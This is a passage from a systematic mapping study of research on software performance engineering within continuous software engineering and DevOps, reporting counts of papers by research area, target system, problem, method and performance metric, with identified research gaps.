consolidate our classification schema. We performed a double round of reviews by shuffling reviewers (among the authors of the paper) after the first round. Finally, upon obtaining a consolidated set of keywords, we have re-organized the original categories to obtain the final classification used hereafter. We assigned each author a set of 10 randomly selected papers, to validate the coding schema and keywords, and to ensure a common understanding among the researchers. Subsequently, we discussed on the results of the coding and possible inconsistencies, and we finalized the schema. The resulting classification framework is presented in Table 3. It comprises seven categories, with groupings of pertinent extracted keywords. A detailed description of each keyword is provided in C. Each category addresses the corresponding research questions by using the metrics described in details below. For \(RQ_{1}\), we extracted the information on the research area and target system. Both research areas and targets may be either fully or partially investigated. The primary goals of a paper are included in the fully-investigated research areas and targets. In a partially-investigated research area, either the primary goals of the paper are considered, or it is a secondary area that supports the primary goals (while a partially-investigated target implies that the study can support that targeted system, even if it is not described as central in the paper). As an example, we considered papers, such as [SP40], where _continuous software engineering_ has been partially investigated because the paper mainly focuses on _software performance engineering_. It is important to note that papers might fully investigate one area and partially investigate another one, and therefore there might be more than one research area assigned to each paper. 
Regarding the problems addressed in the selected papers for \(RQ_{2}\), we extracted information on the primary and secondary problems and contributions reported by the selected papers. As an example, we considered _performance requirement_ as the primary problem and _quality of service_ as the secondary problem for paper [SP58], while we considered _performance analysis approach_ as the main contribution and _performance modelling approach_ and _performance prediction approach_ as the secondary contributions for paper [SP45]. The same approach was also applied for \(RQ_{3}\). After extracting all the information from the selected papers, we analyzed the data by counting the number of papers obtained for each data group and metric (see Table 3). Therefore, for \(RQ_{1}\), we counted the number of papers that fully investigated a topic, partially investigated it, or considered the topic (either fully or partially investigated it). Similarly, for \(RQ_{2}\), we counted the papers that considered each research problem (primary, secondary, or both). Following the previous approach, \(RQ_{3}\) was analyzed by counting the number of fully- and partially-evaluated indices, used data, and methods. For the first three RQs, we considered the individual keyword results. \(RQ_{4}\) has been introduced to observe the results across different keywords, with the goal of identifying contexts that have scarcely been investigated. To achieve this goal, we introduced bubble plots, which allowed for a straightforward comparison of how intensively a certain context was investigated in comparison to other contexts. In the plots, the size of the bubbles represents the number of papers that investigate a specific keyword at the intersection of a research area (x-axis) and domain (y-axis). The exact number of papers is annotated for each bubble. In this way, one can visually identify areas of the plot where no bubbles or only small bubbles are observed, thereby establishing combinations of research areas and target systems where a certain keyword appears to be seldom investigated in the considered literature. Moreover, we analyzed the combination of the previous results and the future improvements and directions described in the selected papers to identify a set of implications for future research. A complete list of the keywords and metrics used for the analysis is presented in Table 3.

## 4 Results Overview

We selected 66 peer-reviewed publications, including 21 (32.3%) articles, 30 (46.2%) conference papers, and 15 (21.5%) workshop (or other satellite-event) papers, as shown in Figure 4. The selected papers were presented at 33 different venues. Figure 5 depicts the list of venues considered by at least two of the selected papers. The selected papers show a continuously growing interest in performance-targeted CSE between 2016 and 2022, while a very small number of publications were published until 2015, which is in line with the fact that continuous development and DevOps have emerged only recently [7].

Figure 4: Selected paper types.

Figure 5: Selected papers per venue.

Thus, we can gather that the intuition of supporting SP through continuous engineering solutions has been strengthened since 2015, although there has been a decrease in the number of publications in 2020 and 2021.
The cumulative number of citations per year for the primary studies (Figure 6, blue line, source: Google Scholar) highlights that the growing interest concerns not only the publications but also the number of citations obtained from the studies of the dataset. Moreover, citations have grown rapidly since 2016. It is worth noting that the entire dataset has a total of more than 3000 citations to date (i.e., they have more than doubled in the last six years). This result indicates an important growing interest in the context of this study. Thus, although the DevOps and CSE domains are relatively young compared with performance engineering, significant contributions have been made in the last ten years and researchers are becoming increasingly active (Figure 6).

Figure 6: Cumulative number of primary studies and citations in each year, and by type of publication.

\begin{table}
\begin{tabular}{c l l l}
\hline \hline
**RQ** & **Categories** & **Keywords** & **Metrics** \\
\hline
RQ1 & Research area & Software performance engineering, Software architecture, Continuous Software Engineering, DevOps, Continuous Monitoring, Agile software development. & \#Fully investigated topics (F) \\
 & Target system & Embedded / CPS, Cloud, Real-time, Distributed, Data intensive, Software intensive, Component-based software / Microservices / SOA. & \#Partially investigated topics (P); \#Investigated topics (F, P) \\
\hline
RQ2 & Research problems & Performance evaluation/assessment, Performance requirement, Quality of service, Resource allocation / deployment, Uncertainty. & \#Main target problem/contributions (M) \\
 & Contributions & Performance analysis approach, Domain specific languages, Continuous engineering framework, Performance modelling approach, Tool support, Performance prediction approach, Self-adaptation. & \#Secondary target problem/contributions (S); \#Main or Secondary target problem/contributions (M, S) \\
\hline
RQ3 & Methodologies & Performance model, Model based engineering / Model driven engineering (MBE/MDE), Performance antipattern / Root cause / Bottleneck detection, Performance prediction techniques, Performance analysis techniques, Parametric dependency, Performance testing / Load Testing / Benchmarking, Performance model generation/extraction, Simulation, Machine Learning, (Multi-objective) Optimization. & \#Fully evaluated indices/data/methods (F) \\
 & Measures / Indices & Response time, Utilization, Throughput, Resource demand, Network bandwidth, Memory / Memory Leaks. & \#Partially evaluated indices/data/methods (P) \\
 & Used Data (input) & Runtime / Monitored, Workload, Requirements, Performance model, Software model, Data analytics. & \#Fully or Partially evaluated indices/data/methods (F, P) \\
\hline
RQ4 & Research area and Target system combined with data from RQ2 and RQ3 & All keywords of RQ1 combined with specific keywords of RQ2 and RQ3. & \#Fully or Partially addressing a specific combination of keywords (F, P) \\
\hline \hline
\end{tabular}
\end{table}
Table 3: Classification framework: Data Extraction, Keywords, and Metrics adopted for the analysis. Keywords in blue have been obtained in the manual keyword refinement step.

In the following sections, we present the results of this study aimed at answering our research questions (see Section 3.1). For each extracted piece of information, we report both the quantitative data and an interpretation of the results obtained.

## 5 What research areas and target systems have been investigated (RQ1)

The topic considered combines several aspects, as we discussed in Section 2, which may attract interest from different disciplines and for different scopes of research. To provide an overview of this research topic, we describe the research areas focused on providing solutions and the target systems for which solutions have been developed.

### Research areas

Figure 7 depicts the principal **research areas** that are focus areas of the selected papers (each study may contribute to more than one area). The bar chart in the figure compares the identified research areas with respect to the number of papers. Although our topic is characterized by the dimensions shown in this figure, the fact that the selected papers contribute to these specific fields of research is not obvious. For instance, a paper may just use a specific performance evaluation technique without contributing in that area. For each research area, we stacked two different bars to combine both the _fully_ and _partially investigated_ areas (as described in Section 3.4).

As expected, the selected papers mainly focus on the areas of _software performance engineering_ (48 of \(66\) papers) and _software architecture_ (36 papers), which is in agreement with the information on publication venues obtained in the publication trends. Of the 48 papers, 28 (14 fully) investigated both _software performance engineering_ and _software architecture_, that is, they offered a specific contribution in architecture-based performance engineering of software systems. More specifically, of the 28 papers, 14 papers (fully or partially) intensively used architectural/software models; some of them were devoted to model-based software engineering ([SP8], [SP63], [SP11], [SP14], [SP58], [SP9], [SP12], and [SP29]), and others focused on model-driven software engineering ([SP48], [SP46], [SP53], [SP61], and [SP26]). Many studies have contributed to _continuous software engineering_ (38 papers). They considered at least one of the continuous dimensions introduced in Section 2, that is, continuous integration (8; [SP23], [SP8], [SP43], [SP11], [SP60], [SP57], [SP59], and [SP62]), continuous deployment (5; [SP53], [SP59], [SP30], [SP25], and [SP61]), continuous development (3; [SP59], [SP61], and [SP15]), continuous improvement (17; [SP4], [SP8], [SP23], [SP63], [SP40], [SP43], [SP11], [SP60], [SP57], [SP3], [SP53], [SP48], [SP22], [SP59], [SP62], [SP32], and [SP36]), and CSE in general (10; [SP48], [SP22], [SP49], [SP59], [SP62], [SP24], [SP28], [SP37], [SP61], and [SP15]). Particular interest (31 papers) was observed in regard to _continuous monitoring_ (hence, we decided to show it separately from the other continuous dimensions).
_Nineteen_ papers focused on the areas of _software performance engineering_, _software architecture_ and _continuous software engineering_, implying that they not only considered methodologies and techniques of these areas but also provided a scientific contribution to them; thus, they were positioned in the context of this topic. Moreover, 15 papers included a combination of _software performance engineering_, _software architecture_ and _continuous monitoring_. Only _nine_ of the selected papers covered _DevOps_ and only _five_ papers focused on the architectural support of performance engineering in the _agile_ development process. Of them, _three_ papers combined _software performance engineering_, _software architecture_ and _DevOps_ ([SP50], [SP62], and [SP61]), whereas _three_ papers combined _software performance engineering_, _software architecture_ and _agile_ ([SP8], [SP63], and [SP15]). For each area, the relationship between _fully-_ and _partially-investigated_ is proportional (i.e., a good percentage of the areas are fully investigated). However, only for _continuous software engineering_ does the number of papers partially investigating the area increase.

### Target systems

Figure 8 describes the specific types of systems targeted (as case studies) by the selected papers. These keywords are not meant to be mutually exclusive, in that a system could be, for example, at the same time a distributed and a real-time one. We have basically identified, in each paper, the main characteristics of the systems to which the paper's approach/solutions have been (or can potentially be) applied, where they could be unambiguously identified. The main focus is on _software intensive systems_ (23 papers), such as systems of systems (SoS) ([SP43] and [SP19]), automotive software ([SP60]), and business process management ([SP8]). Similarly, a significant number of applications (23 papers) are in _component-based systems_ (_CBS_), and several papers focus on service-oriented architectures (SOA) ([SP12] and [SP17]) and microservices ([SP41] and [SP61]). In addition, _distributed systems_ (16 papers) have attracted considerable interest. However, few of the papers cover _embedded systems_ (including _cyber physical systems_ (_CPS_); 7 papers) and _real-time systems_ (6 papers). A new emerging application domain is related to big data and its management and analysis (_data intensive systems_; 7 papers). Concerning the relationship between the _fully-_ and _partially-investigated_ targets, it is observed that the larger targets (such as _software intensive systems_) are represented by several papers which are only partially placed in that context. This may depend on the fact that more than one target may be assigned to each paper. For instance, [SP60] fully covers the domain of _CPS_, in particular automotive, and partially covers _software intensive systems_. In other cases, some papers do not offer a solution dedicated to a specific target but are placed in a more general manner, as in the case of [SP32].

### Discussion

Significant attention has been paid to continuous monitoring of data to realize continuous development, delivery, and integration, which improve system performance at the level of SA. As the monitored data enable performance analysis, continuous monitoring represents a fundamental capability to provide CSE.
Figure 7: Research areas - results.

Figure 8: Target systems - results.

In general, the results confirm that, in the areas of SA and SP, CSE is an emerging topic that is progressively gaining the interest of researchers and practitioners. Existing conferences and systematic reviews on DevOps suggest that software engineering researchers have a strong interest in this topic. Despite this, only a few papers focus on DevOps, underlining an interesting gap to be addressed by the research community. However, the limited number of articles on agile is an expected result. Even as a precursor to DevOps, agile development is more code-focused and produces less documentation (e.g., software/design models), disabling SA-based SPE. Although a large number of selected papers have been fully identified as contributors to the CSE field, the number of papers that partially investigate this area has increased. Beyond that, several selected papers have not been placed within the context of CSE or DevOps, which can be attributed to the fact that these papers do not explicitly place themselves in these areas, even if they actually offer solutions that cover several aspects of an iterative development process, wherein updates are made continuously. However, this confirms that this emerging theme is gaining ground.

With respect to the targets considered, component-based software and software intensive systems have been the most investigated. These targets are characterized by the existence of different components, services, or subsystems. These can be independent of each other (e.g., microservices) or have strong dependencies and relationships amongst themselves and with the environment, as in many complex systems. However, in both cases, the presence of heterogeneous components makes it necessary to integrate these activities into continuous development and maintenance (e.g., DevOps). The component-based development paradigm is based on the concept of reuse within distinct components (e.g., services), enabling integration. Once integrated and implemented, these components must enter a continuous dimension, that is, their behavior must be known and analyzed after the integration and not only at the level of the single component; therefore, they are also important in the context of performance. Next, the results show the targets of cloud and distributed systems, characterized by the technology stack and infrastructure complexity. Cloud nodes may attain performance orders of magnitude worse than other nodes [44]. For instance, if, during the hosting of a mission-critical service or a scientific application, performance variability and availability become a concern, cloud monitoring is required to continuously measure and assess the infrastructure or application behavior (in terms of performance, reliability, power usage, and security) to adapt the system to changes or to apply corrective measures. Generally, we can observe that in open systems characterized by uncontrolled requests, continuous engineering, which supports their integration and evolution, is fundamental to identifying the occurrence of further problems not observed before. Finally, we note that more recent and innovative targets are not yet widely investigated. For instance, in the case of data-intensive systems, the massive use of big data and machine learning requires efficient management of resources, performance, and security.
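To make the continuous-monitoring loop described above more concrete, the following minimal sketch shows a hypothetical watchdog that aggregates one window of monitored response times and utilization and raises an adaptation trigger when a threshold is violated. The metric fields, the thresholds, and the `on_violation` hook are illustrative assumptions for this sketch only; they are not taken from any of the selected papers.

```python
from dataclasses import dataclass
from statistics import mean
from typing import Callable, Iterable

@dataclass
class Sample:
    response_time_ms: float   # end-to-end response time of one request
    cpu_utilization: float    # utilization of the hosting node, in [0, 1]

def check_window(samples: Iterable[Sample],
                 rt_slo_ms: float = 200.0,
                 util_limit: float = 0.8,
                 on_violation: Callable[[str], None] = print) -> bool:
    """Aggregate one monitoring window and raise an adaptation trigger
    when the response-time SLO or the utilization limit is exceeded."""
    samples = list(samples)
    if not samples:
        return False
    avg_rt = mean(s.response_time_ms for s in samples)
    avg_util = mean(s.cpu_utilization for s in samples)
    violated = avg_rt > rt_slo_ms or avg_util > util_limit
    if violated:
        on_violation(f"adapt: avg_rt={avg_rt:.1f} ms, avg_util={avg_util:.2f}")
    return violated

# One hypothetical window of monitored samples from a cloud-hosted service.
window = [Sample(180, 0.62), Sample(250, 0.91), Sample(210, 0.85)]
check_window(window)  # prints an adaptation trigger for this window
```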
_Main findings:_

* Significant attention is paid to continuous monitoring of data, which represents a fundamental capability to provide CSE;
* CSE and DevOps are gaining ground: most studies offer solutions covering several aspects of the iterative development process where updates are made continuously;
* Software intensive systems, especially when component-based, are the most investigated ones: their heterogeneous components require the integration of their activities in a continuous development and maintenance process;
* More recent and innovative targets, such as cloud and data intensive systems, have not been widely investigated.

## 6 What and how performance problems have been addressed (RQ2)

We classified the 66 selected papers by considering the target problems addressed by them (we divided the target problems into five categories) and their research contributions (we identified seven different types of contributions). In particular, the selected papers were thematically associated with at least one target problem and at least one research contribution based on their research directions and scope. We provide a detailed overview of the performance problems that have been addressed and illustrate them with exemplary papers.

### Research problems

Figure 9 presents the problems targeted by the selected papers (**target problem**).

Figure 9: Research problems - results.

The results obtained confirm that most of the selected papers (46 of 66) are focused on _performance evaluation_. They include methods and techniques aimed at evaluating or predicting the expected performance within a continuous (re-)engineering of the system. For instance, [1] presents an approach for continuous integration of performance models during agile development, by optimizing the learning of parametric dependencies, whereas [1] presents an approach that allows continuous performance adaptation through model predictive control. We can see that 22 selected papers aim to provide _QoS_, where the target is to satisfy different requirements/properties for the overall quality of the system, including guaranteeing a certain level of performance. For instance, in [1], the authors proposed an approach for the automated extraction of quality-aware architecture models to explore the performance properties in design-time and runtime scenarios. In [14], the authors presented a method to apply the DevOps paradigm in the context of QoS-aware adaptive applications. In addition to performance, some of the selected papers provide specific support for other properties, such as availability ([14] and [14]), reliability ([14], [15], [16] and [17]), privacy ([15]), scalability and resilience ([14]). Moreover, 13 of these considered _resource allocation_. This is an expected outcome that is strictly related to our query. The problem of allocating resources is a great challenge during continuous development and operation and can severely impact the fast/frequent delivery of the team. For instance, in [14], resource profiles were used to detect (performance) changes in enterprise application versions and to support capacity planning for new deployments. In [14], performance models were extracted from the continuous monitoring of operational data, and then used to simulate performance metrics (resource utilization, response times, and throughput) and runtime costs of distributed and component-based applications. Furthermore, 11 selected papers addressed the _performance requirement_.
Recently, with the increasing complexity of systems, high-performance requirements have become inevitable. For instance, [14] proposed a tool to discover secure architectural design options satisfying cost and performance requirements, while [14] proposed a performance-driven software refactoring approach to continuously assess and act with the aim of satisfying performance requirements. Notably, the mapping revealed that _uncertainty_ is an emerging target problem (6 papers). These papers offered interesting solutions to evaluate and predict the performance of the system, even in uncertain conditions. These works considered different types of uncertainty that inevitably affect the accuracy of quality evaluations. External uncertainty stems from the complexity and unpredictability of the physical environment (as in [14] and [14]) and of the non-software-controlled parts (such as cloud networks [14]). Other papers ([14] and [15]) referred to both external and internal uncertainty, where the latter refers to the uncertainty stemming from the complexity of the software system itself (large codebases, multiple development teams, diverse development practices and standards, etc.). A different characterization of uncertainty has been described in [14], distinguishing uncertainty in parameters, models, code, and monitored data and providing a solution to detect violations of performance requirements in the DevOps process.

### Research contributions

Figure 10 describes the principal **research contributions**. From our analysis, we can state that most of the studies contribute to the continuous performance assessment of the system with _performance analysis_, _performance modelling_, and _performance prediction_ approaches. In particular, _performance analysis_ approaches, including methods and tools that allow the analysis of performance during the continuous engineering of the system, have been proposed in 23 papers. For instance, [14] proposed a method for continuously assessing the performance requirements using the system architecture. In contrast, [14] proposed a performance analysis approach based on process mining. In addition, 23 papers proposed approaches that contribute to the process of modelling the performance of the system (_performance modelling_). For instance, [14] presented a UML profile for the design, quality assessment, and deployment of data-intensive applications, whereas [14] generated layered queuing networks for the performance analysis of data-intensive applications. Furthermore, 26 papers have proposed approaches for _performance prediction_. For instance, [14] proposed a model-based approach that was integrated into a continuous delivery pipeline, allowing the prediction of memory management and garbage collection behavior. In contrast, [14] proposed an approach of continuous assessment and adaptation through model predictive control. In addition, we identified 19 papers that considered _self-adaptation_, allowing continuously running software systems to operate in changing contexts while meeting their quality requirements. Most of the approaches use performance evaluation to achieve the desired QoS objectives in software systems. Such approaches aim to provide, for instance, re-configurable SAs ([14] and [14]), self-adaptive microservice architectures ([14]), or self-adaptation of performance parameters on the running system ([14] and [14]).
In contrast, [14] presented a framework for self-adaptive monitoring to investigate performance anomalies in component-based software systems. Notably, only [14] partially addressed self-adaptation under uncertain conditions. In particular, the authors modeled and analyzed the behavior and performance of Cloud systems to adaptively serve end-user requests, considering the uncertain behavior of resources and networks. A new research direction is emerging that is related to _domain specific languages_, for which we report only 9 selected papers out of the 66 considered. For example, [14] extended the hybrid architecture analysis and design language to support the modeling of environmental uncertainties and performed quantitative evaluations against various performance queries. In [14], the authors proposed a domain specific model approach to design, deploy, and monitor the performance quality in applications related to big data analytics. [14] proposed a domain-specific language that allowed for the modeling of workload specifications of session-based systems for load testing and performance prediction. A large number of papers (37) provide _tool support_ to aid in performance engineering research. In addition, a considerable number of approaches have considered a _continuous engineering framework_ (27). Both _tool support_ and _continuous engineering framework_ are generally considered together along with other research contributions. For instance, [12] provided tool support for the extraction of architectural performance models based on the monitoring of log files, whereas [12] proposed a continuous engineering framework to automatically build and parameterize performance models for large scale enterprise systems.

Figure 10: Research contributions - results.

### Discussion

Most studies in this area are aimed at solving performance evaluation and assessment problems. This is a relevant goal in the development of modern systems, where increasingly agile paradigms require that performance analyses be in a continuous dimension to be effective. Notably, 22 papers were found to focus on QoS. Of them, 15 papers used a self-adaptation approach, implying that in 15 of the 18 papers, the self-adaptation approach targeted QoS rather than just performance. Managing the uncertainty of the system behavior is an emergent topic (papers addressing this issue are recent publications), and it is cross-cutting to the target problems previously mentioned. Although having the complete model of the system represents the ideal situation, in practice, only partial and limited measures are available. Consequently, specialized performance analysis or prediction techniques must work with uncertain knowledge. The proposed studies and their discussions on the different types of uncertainty highlight relevant issues and offer new research ideas. More than half of the target problems considered were addressed using the support of tools and were well partitioned between performance prediction, performance analysis, and performance modeling. The other target problems were dedicated to self-adaptation approaches and, to a lesser extent, domain specific languages. The latter result shows that few studies have exploited abstraction for continuous performance control, although they consider large heterogeneous runtime data. Raising the level of abstraction of the specification would favor increased automation and interoperability.
Finally, in most studies (52 of 63 papers), support for CSE is provided by means of dedicated tools or frameworks. This is an interesting result, as in the context of this study, the quality and performance requirements demand the support of continuous engineering frameworks or dedicated tools.

_Main findings:_

* Performance prediction, performance analysis and performance modelling have been further explored in order to offer adequate support in continuous development;
* A relevant number of self-adaptation approaches have been proposed to ensure the quality of services (including performance);
* Quality and performance requirements demand the support of continuous engineering frameworks or dedicated tools.

## 7 What instruments have been adopted (RQ3)

Performance analysis can be conducted by adopting multiple techniques with different output-targeted metrics and with the support of different types of input data. In this section, we aim to identify the instruments that are adopted most often in the context of the study.

### Input data

Figure 11(a) reports the input **data**. In regard to CSE, a system is continuously monitored to feed performance indices back into a performance model that supports predictive analyses. A total of 61 and 32 papers (of 66) used _runtime/monitored_ data and _performance model_ as input data, respectively. Fewer papers consider the performance model as input data because performance models have been integrated into software engineering processes only in the last few years, whereas runtime performance assessment and fixing have long been considered common practice. The majority of the papers (34) that used monitored data also proposed a continuous approach to monitoring performance features and then used them mainly for analysis and prediction (e.g., [12], [13], [14], and [12]). In contrast, other studies applied simulation ([12]), system execution modelling [18] ([15]), and performance model generators leveraging execution data (e.g., [12]). However, papers that used performance models mainly adopted UML + MARTE (e.g., [12] and [12]), queuing networks ([13], [14] and [15]) or the Palladio component model ([13] and [14]). Of the 61 papers using runtime/monitored data, only _five_ papers did not provide explicit information about it while employing performance models. In particular, [13] considered changing non-functional requirements and provided a method for continuously assessing the performance requirements using the system architecture. [13] proposed an approach for optimizing performance, cost, and security in architectural design, and it performed static analysis (i.e., using taint analysis) for the identification of architecture-level vulnerabilities. [13] analyzed different and correlated QoS models, thereby reducing the overall uncertainty while continuously re-architecting the system. [13] proposed the use of performance unit testing to explore the performance characteristics and continuously detect potential performance problems throughout the development of a software system. [13] defined an approach to predict system performance based on event-driven architecture modelling of the system interactions and impacts. A significant number of papers (14) considered the _software model_ as an input to the process. This is likely due to the different notations that are usually adopted for representing software models, preventing an automated full integration in the performance assessment task.
The papers that considered the _software model_ as input fully investigated this aspect in most cases; some of these studies ([13]) proposed automated techniques based on model transformations to develop the _software model_ as a first-class artifact in the software engineering process. The results here also provide evidence that _data analytics_ have not yet been largely considered in this domain (9 papers, including [13], [SP41], and [SP21]). However, interest in data analytics has grown over time; thus, data analytics is expected to become a primary source of inputs in the next few years. For each type of input data, the relationship between _fully_ and _partially investigated_ papers is proportional (a good percentage of the methodologies/techniques are fully investigated), with the exception of the _software model_ mentioned above and _data analytics_, for which the relatively high number of _partially investigated_ ones (_five_ of _nine_) is very likely due to the recent progress in the development of techniques for performance data analytics.

### Methodologies and techniques

Figure 11(b) presents the **methodologies/techniques** used in the selected papers. As expected, the majority of papers focus on _performance modeling_ (37 of \(66\)) and _performance analysis_ (32 of \(66\)). It is necessary to build and analyze models to address performance issues early in the lifecycle, as confirmed by the fact that many of these papers intend to address this aspect ([SP24], [SP56], and [SP55]). _Model based software engineering_ and _model driven engineering_ techniques were also widely considered (26 papers), as they did not restrict the adoption of models to the performance domain. However, in several cases, models were also considered (as first-class citizens) in the software engineering domain ([SP63], [SP48], and [SP14]). A considerable number of papers deal with _performance model extraction_ and _performance testing_ techniques (both 23 papers), which were typically adopted when studying performance issues on existing running software systems ([SP46] and [SP30]). Finally, it is observed that although in the last few years the adoption of _machine learning_ and _multi-objective optimization_ techniques has spread in diverse fields in the context of CSE, they are still marginally considered, as _six_ papers each focus on these techniques. For each methodology/technique, the relationship between the _fully-_ and _partially-investigated_ is proportional (i.e., a good percentage of methodologies/techniques are fully investigated). Only for _performance analysis_ does the number of papers that partially investigate this methodology increase, as is the case with [SP62] and [SP32], which deal with the Palladio component model and queueing networks. It is observed that this occurs despite the fact that _performance modeling_ is fully investigated. In certain contexts, extensive performance analysis can be difficult owing to the lack of system measurements and parameter values. Hence, in such cases, performance modeling can be fully investigated, but the analysis remains marginal among the contributions of the papers.

### Output measures and indices

Figure 11(c) shows the targeted output **measures/indices**. The three typical performance indices, namely _response time_ (40), _utilization_ (32), and _throughput_ (17), are the most widely targeted ones in the considered papers; the standard operational relations linking these three indices are recalled below.
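As general background for the discussion of these indices (standard operational analysis, not a contribution of the selected papers), the three measures are tightly coupled: denoting by \(X\) the system throughput, \(R\) the mean response time, \(N\) the mean number of requests in the system, and \(D_{k}\) the service demand placed on resource \(k\),

\[
U_{k} = X \cdot D_{k} \quad \text{(Utilization Law)}, \qquad N = X \cdot R \quad \text{(Little's Law)},
\]

so that measuring any two of throughput, response time, and population (or utilization and demand) constrains the third.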
Although, on the one hand, this can be seen as an expected outcome, on the other hand it is somewhat surprising that _memory_ (9) and _network bandwidth_ (8) have been significantly less studied in this context. These two measures may play crucial roles in the performance assessment of modern heterogeneous distributed software systems. Hence, this result evidences a lack of investigation in this direction. These outputs are _fully investigated_; hence, no realistic consideration can be made of the few _partially investigated_ ones. A few papers have considered multiple types of measures ([SP39], [SP30], [SP31], and [SP12]).

Figure 11: Data, methodologies/techniques, measures/indices - results.

### Discussion

We have analyzed the selected papers with the consideration that an approach can be categorized into three elements: _input data_, _methodology/technique_, and _output measures/indices_. Not all selected papers clearly follow this schema, but the results obtained provide some interesting insights into the combination frequencies of these three elements. Based on a straightforward observation of the results, it can be seen that _performance modeling_ and _analysis_ techniques that take as input _runtime/monitored_ data and produce _response time_ and _utilization_ indices as output have received the most consideration (to date). This is a relevant confirmation of what performance analysts are expected to do in the context of CSE processes. However, it is unexpected that, regardless of the technique adopted, _requirements_ and _data analytics_ rarely enter the process to target _memory_ and _network bandwidth_. This highlights a lack of investigation, which is crucial especially in the domain of distributed heterogeneous software systems (CPS, edge computing, IoT, and data-intensive systems). On the one hand, data analytics are ever more available and performance requirements are ever more stringent; on the other hand, traditional performance measures (such as response time and utilization) in isolation do not provide an integrated vision of the system performance behavior, which can suffer from performance degradation owing to a bad usage of memory and poor network connections.

_Main findings:_

* Approaches of performance modeling and analysis techniques that take as input monitored data and produce response time and utilization indices as output are widely used methodologies. Requirements and data analytics rarely enter the process to target memory and network bandwidth;
* Even if machine learning and multi-objective optimization techniques are being increasingly studied, they are still marginally considered in the context of CSE;
* Model-based and model-driven techniques are widely considered, as they do not restrict the adoption of models to the performance domain, but in several cases, software models are also considered.

## 8 Current research gaps and future directions (RQ4)

In this section, we aim at detecting potential research gaps by visualizing the number of papers that lie at the intersection of research areas and target systems for each keyword of interest. In the following subsections, we discuss our findings in the categories of keywords: _target problems_, _research contributions_, _used methodologies and techniques_, _used performance measures and indices_, and _input data_. To represent our results, we developed bubble plots, as described in Section 3; a minimal sketch of how such plots can be produced from the extracted data is shown below.
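The following sketch is only illustrative: the data frame columns and the example rows are hypothetical placeholders for the extraction results (not the actual data), and pandas/matplotlib are used merely to show the counting and plotting steps behind the bubble plots.

```python
import pandas as pd
import matplotlib.pyplot as plt

# Hypothetical extraction table: one row per (paper, research area, target system)
# combination in which a given keyword was fully or partially investigated.
rows = [
    ("SP01", "CSE", "Cloud"), ("SP02", "CSE", "Cloud"),
    ("SP03", "DevOps", "CBS/SOA/Microservices"), ("SP04", "SPE", "Distributed"),
]
df = pd.DataFrame(rows, columns=["paper", "research_area", "target_system"])

# Count distinct papers at each (research area, target system) intersection.
counts = (df.groupby(["research_area", "target_system"])["paper"]
            .nunique().reset_index(name="n_papers"))

# Bubble size proportional to the number of papers; annotate the exact count.
fig, ax = plt.subplots()
ax.scatter(counts["research_area"], counts["target_system"],
           s=counts["n_papers"] * 200, alpha=0.5)
for _, r in counts.iterrows():
    ax.annotate(str(r["n_papers"]), (r["research_area"], r["target_system"]),
                ha="center", va="center")
ax.set_xlabel("Research area")
ax.set_ylabel("Target system")
plt.tight_layout()
plt.show()
```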
Moreover, we discuss the implications for future research based on the research gaps analyzed and the future directions described in the selected papers.

### Target problems

Figures 12 and 13 show the bubble plots for the _Performance evaluation_ and _Uncertainty_ target problems, respectively.

Figure 12: Number of papers investigating the keyword _performance evaluation (target problem)_ at the intersection of research areas and target systems.

Figure 13: Number of papers investigating the keyword _uncertainty (target problem)_ at the intersection of research areas and target systems.

The plots present a very different situation. Many studies have targeted the problem of performance evaluation, especially in certain areas, and few papers have considered uncertainty in general. A reason for this may be attributed to the fact that uncertainty has emerged only recently as a distinct concern in software engineering and its inclusion in continuous engineering practices is still very limited. In contrast, because the general problem of performance evaluation is specifically targeted by our study, a greater number of papers are expected to consider it. From Figure 12, it is evident that certain research areas (continuous monitoring, DevOps, and agile) never intersect with certain target systems (real-time, embedded and CPS) when pursuing performance evaluation. This could simply be due to the scarce adoption of DevOps and agile practices in these systems. A further gap appears in the area of the development of software intensive systems, even if it is continuously evolving owing to the adoption of new technologies, such as cloud computing, IoT, and artificial intelligence; continuous engineering and DevOps can benefit from new performance engineering solutions to achieve more pervasive software (for example in smart cities, smart manufacturing, and smart mobility).

### Research contributions

Among the several research contributions identified, we report the plots for _continuous engineering framework_ (Figure 14) and _performance prediction_ (Figure 15), as we considered them to be relevant for the purposes of our study. In Figure 14, we observe that most of the papers proposing a novel continuous engineering framework are gathered in the lower half of the plot. The target systems for which most of these frameworks are designed are CBS/SOA/Microservices, software intensive systems, and distributed systems. Predictably, CSE is the most targeted research area in this field. However, continuous engineering frameworks are rarely or never proposed in real-time and embedded systems. Figure 15 shows that only a few papers proposed performance prediction approaches in embedded, real-time, and data-intensive systems. In addition, only three papers appear to focus on both DevOps and agile. This may represent a research gap to be filled in the next few years because approaches based on artificial intelligence and machine learning, such as those in the AIOps [46] field, are rapidly emerging as a new way of modeling and predicting performance that can be more easily integrated with current DevOps practices.

### Input data

The types of data that are used as input to the approaches play a significant role in establishing the situations in which an approach can be applied and the type of information required to initiate the process. _Workload_ (Figure 16) and _requirements_ (Figure 17) are the types of data whose consideration appears to be related to the specific target system.
For instance, while the workload is often considered in _cloud_, _distributed_, and _CBS/SOA/microservices_ systems, it is almost never considered in _embedded_, _real-time_, and _data intensive_ systems. The lack of consideration of workload in embedded and real-time systems is expected, whereas in data intensive systems it presents a research opportunity. When considering the use of requirements, we are presented with a different situation. From the number of papers in the bubble plot, it appears that _DevOps_ and _agile_ do not put much emphasis on the requirements when assessing performance; this is unexpected because they consider the specification of requirements in their processes. In addition, the _software intensive_ and _CBS/SOA/microservices_ systems often consider the requirements as the starting point for the development of performance engineering approaches.

Figure 14: Number of papers investigating the keyword _continuous engineering framework (research contribution)_ at the intersection of research areas and target systems.

Figure 15: Number of papers investigating the keyword _performance prediction (research contribution)_ at the intersection of research areas and target systems.

Figure 16: Input data - Workload.

Figure 17: Input data - Requirements.

### Methodologies and techniques

